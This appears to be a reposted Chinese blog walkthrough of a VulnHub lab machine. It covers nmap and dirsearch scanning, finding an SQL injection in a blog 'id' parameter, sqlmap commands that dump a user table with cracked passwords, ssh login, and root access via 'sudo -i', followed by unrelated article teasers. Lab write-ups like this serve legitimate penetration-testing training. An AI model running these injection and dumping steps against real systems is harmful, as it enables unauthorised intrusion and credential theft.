【精選】 VulnHub (超詳細解題過程)

🍬 博主介紹👨?🎓 博主介紹:大家好,我是 hacker-routing ,很高興認識大家~
?主攻領域:【滲透領域】【應急響應】 【python】 【VulnHub靶場復現】【面試分析】
🎉點贊?評論?收藏 == 養成習慣(一鍵三連)😋
🎉歡迎關注💗一起學習👍一起討論??一起進步📝文末有彩蛋
🙏作者水平有限,歡迎各位大佬指點,相互學習進步!

一、信息收集

1.主機探測

靶機IP地址是:192.168.111.131

2.nmap掃描

端口開放了22、25、80、631端口

┌──(root💀kali)-[~/桌面]
└─# nmap -sS -A 192.168.111.131

nmap漏洞掃描

掃描出來這么多漏洞,包括跨站請求偽造csrf、文件遍歷、sql注入等

┌──(root💀kali)-[~/桌面]
└─# nmap --script=vuln -p22,25,80,631 192.168.111.131
使用 --script=vuln 可以對目標主機或目標主機所在的網段應用弱口令檢測

3.目錄掃描

┌──(root💀kali)-[~/桌面]
└─# dirsearch -u http://192.168.111.131

二、漏洞利用

1.web滲透利用

端口開放22,25,80,631,其中631關閉了,22掃描沒有有關的漏洞,放在最后看,25郵件服務,80web端口,從目前看是最先利用的端口了

80web端口:

自己碰到這種頁面,可以嘗試著自己多點擊一下功能,看看有什么突破沒有

我這里在點擊Blog模塊,然后再隨機點擊別的,就出現了以下 的界面,可能存在sql注入漏洞

在這里嘗試輸入不同的id值,發現:

輸入5以后的數字,就變成了一篇文章,說明存在sql注入漏洞

我們現在再利用單引號'去,看看會不會發生報錯,去檢測sql注入的注入點

發現報錯了,說明192.168.111.131/index.html?page=blog&title=Blog&id=5是注入點

2.sqlmap注入

sqlmap一把梭

##數據庫
sqlmap -u "192.168.111.131/index.html?page=blog&title=Blog&id=5" --dbs --batch##表
sqlmap -u "192.168.111.131/index.html?page=blog&title=Blog&id=5" -D ehks --tables --batch ##列
sqlmap -u "192.168.111.131/index.html?page=blog&title=Blog&id=5" -D ehks -T user --columns --batch ##字段
sqlmap -u "192.168.111.131/index.html?page=blog&title=Blog&id=5" -D ehks -T user -C user_id,user_name,user_pass --dump --batch

數據庫ehks的表user中,成功發現了幾個用戶名和密碼,并對密碼的md5進行了自動破解

+---------+-----------+--------------------------------------------------+
| user_id | user_name | user_pass                                        |
+---------+-----------+--------------------------------------------------+
| 1       | dstevens  | 02e823a15a392b5aa4ff4ccb9060fa68 (ilike2surf)    |
| 2       | achen     | b46265f1e7faa3beab09db5c28739380 (seventysixers) |
| 3       | pmoore    | 8f4743c04ed8e5f39166a81f26319bb5 (Homesite)      |
| 4       | jdurbin   | 7c7bc9f465d86b8164686ebb5151a717 (Sue1978)       |
| 5       | sorzek    | 64d1f88b9b276aece4b0edcc25b7a434 (pacman)        |
| 6       | ghighland | 9f3eb3087298ff21843cc4e013cf355f (undone1)       |
+---------+-----------+--------------------------------------------------+

3.ssh遠程連接

一般發現賬號密碼,然后又開啟了22端口,先嘗試下利用ssh遠程連接

但是這里發現是ssh的版本過低的原因

經過利用chatgpt的提示,得到下面的命令行,成功拿到了dstevens用戶的權限

ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 dstevens@192.168.111.131

三、提權

1.SUID提權

發現沒有什么可以利用提權的命令

[dstevens@ctf4 mail]$ find / -user root -perm -4000 -print 2>/dev/null

2.sudo提權

sudo -l

發現直接可以是最高權限

直接sudo -i拿到root權限

3.flag

可以利用find查找下flag在哪

[root@ctf4 ~]# find / -name *flag*

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/214820.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/214820.shtml
英文地址,請注明出處:http://en.pswp.cn/news/214820.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

C# 任務的異常和延續處理

寫在前面 當Task在執行過程中出現異常或被取消等例外的情況時,為了讓執行流程能夠繼續進行,可以使用延續方法實現這種鏈式處理;還可以針對前置任務不同的執行結果,選擇執行不同的延續分支方法。子任務執行過程中的任何異常都會被…

線程安全的哈希表ConcurrentHashMap

1. HashTable 不推薦使用,無腦給各種方法加鎖 2.ConcurrentHashMap 多線程下推薦使用 鎖粒度控制 HashTable直接在方法上加synchronized,相當于對哈希表對象加鎖,一個哈希表只有一把鎖。多線程環境下,無論線程如何操作哈希表…

深入理解Dubbo-3.高級功能剖析和原理解析

👏作者簡介:大家好,我是愛吃芝士的土豆倪,24屆校招生Java選手,很高興認識大家📕系列專欄:Spring源碼、JUC源碼、Kafka原理、分布式技術原理🔥如果感覺博主的文章還不錯的話&#xff…

利用貝葉斯超參數優化,提升模型效果更科學(附Python代碼)

超參數優化在大多數機器學習流水線中已成為必不可少的一步,而貝葉斯優化則是最為廣為人知的一種“學習”超參數優化方法。 超參數優化的任務旨在幫助選擇學習算法中成本(或目標)函數的一組最佳參數。這些參數可以是數據驅動的(例…

【UE5】初識MetaHuman 創建虛擬角色

步驟 在UE5工程中啟用“Quixel Bridge”插件 打開“Quixel Bridge” 點擊“MetaHumans-》MetaHuman Presets UE5” 點擊“START MHC” 在彈出的網頁中選擇一個虛幻引擎版本,然后點擊“啟動 MetaHuman Creator” 等待一段時間后,在如下頁面點擊選擇一個人…

Apipost版IDEA插件:Apipost-Helper

Apipost-Helper是由Apipost推出的IDEA插件,寫完接口可以進行快速調試,且支持搜索接口、根據method跳轉接口,還支持生成標準的API文檔,注意:這些操作都可以在代碼編輯器內獨立完成,非常好用!這里…

Tair(2):Tair安裝部署

1 安裝相關依賴庫 yum install -y gcc gcc-c make m4 libtool boost-devel zlib-devel openssl-devel libcurl-devel yum:是yellowdog updater modified 的縮寫,Linux中的包管理工具gcc:一開始稱為GNU C Compiler,也就是一個C編…

N皇后,回溯【java】

問題描述 八皇后問題是十九世紀著名的數學家高斯于1850年提出的。 問題是:在88的棋盤上擺放八個皇后,使其不能互相攻擊,即任意兩個皇后都不能處于同一行、同一列或同一斜線上。可以把八皇后問題擴展到n皇后問題,即在nn的棋盤上擺…

管理類聯考——數學——真題篇——按知識分類——幾何

文章目錄 2023真題(2023-07)-幾何-解析幾何-最值真題(2023-10)-幾何-立體幾何-正方體:體積: V = a 3 V=a^3 V

AX和A(T)X的區別是?

目錄 1.快速了解的例子: (1)假設所有節點的初始特征都是[1, 0, 0] ,那么AX的結果是: (2) 的結果是: (3) 總結: 2.計算結構系數的例子 (1&#xff09…

day45-46-Vue+ElementUI實現學生管理

VueElementUI實現學生管理 代碼: qiushiju/java2313_vue_elementui_crud (gitee.com) 一、思考 考慮需求(登錄,查詢全部,基本增刪改查,分頁,搜索,批量) 設計數據庫搭建項目 后端…

2024美賽備戰2--模型建立(*****必看****)

建模 美賽涉及的建模知識范圍非常廣且深,縱觀美賽真題不難發現,很多的模型 都是讀研或者讀博的時候才會真正深入開始研究,因此,對于做建模的同學來說, 是無法在賽前吃透大量模型的。推薦本科生分兩個步驟去有效準備比賽…

【S32DS RTD實戰】-1.3-S32K3工程生成S19,BIN,Hex文件,以及Post-build steps的妙用

目錄 1 方法一:逐個生成Motorola S-record(s19,srec…),Intel HEX,Bin文件 1.1 生成Motorola S-record(s19,srec…)文件 1.2 生成Intel HEX文件 1.3 生成Bin文件 2 …

python的Streamlit庫的text_input組件

text_input 常用的輸入組件,這里注意記錄一下具體的參數,方便使用 函數簽名 st.text_input(label, value"", max_charsNone, keyNone, type"default", helpNone, autocompleteNone, on_changeNone, argsNone, kwargsNone, *, pla…

【LeetCode】414. 第三大的數

414. 第三大的數 難度:簡單 題目 給你一個非空數組,返回此數組中 第三大的數 。如果不存在,則返回數組中最大的數。 示例 1: 輸入:[3, 2, 1] 輸出:1 解釋:第三大的數是 1 。示例 2&#xf…

計算機服務器中了mkp勒索病毒怎么辦,mkp勒索病毒解密數據恢復

網絡技術的不斷發展,也為網絡安全帶來了威脅,近期云天數據恢復中心的工程師陸續接到很多企業的求助,在本月,很多企業的計算機服務器遭到了mkp勒索病毒攻擊,導致企業計算機系統癱瘓,無法正常工作&#xff0c…

vue生命周期和路由

Vue.js 生命周期是Vue.js實例從創建到銷毀的整個過程中所經過的一系列事件,可以理解為Vue.js的生命周期鉤子函數。在這些生命周期鉤子函數中,你可以添加自定義的邏輯代碼,以便在組件生命周期的不同階段進行不同的操作。Vue.js生命周期共分為八…

Linux的ps簡單實現

原理&#xff1a;遍歷下的/proc/%s/task/%s/status所有文件&#xff0c;兩個%s都為pid號。 注&#xff1a;多線程下&#xff0c;只打印一個pid/task下的所有目錄&#xff0c;即可收集各個線程對應的信息。 $ cat ps.c #include <stdio.h> #include <stdlib.h> #in…

《深入理解計算機系統》學習筆記 - 第四課 - 機器級別的程序

Lecture 05 Machine Level Programming I Basics 機器級別的程序 文章目錄 Lecture 05 Machine Level Programming I Basics 機器級別的程序intel 處理器的歷史和體系結構芯片的構成AMD 公司(Advanced Micro Devices&#xff0c;先進的微型設備) C, 匯編, 機器代碼定義匯編/機器…

2024美賽備戰1--數據處理(數據預處理,異常值處理,預測模型,插值擬合 *****必看****)

1.數據預處理 所謂數據預處理&#xff0c;就是指在正式做題之前對數據進行的一些處理。在有些情 況下&#xff0c;出題方提供的數據或者網上查找的數據并不能直接使用&#xff0c;比如缺少數據甚 至是異常數據&#xff0c;如果直接忽略缺失值&#xff0c;或者沒發現異常數據&am…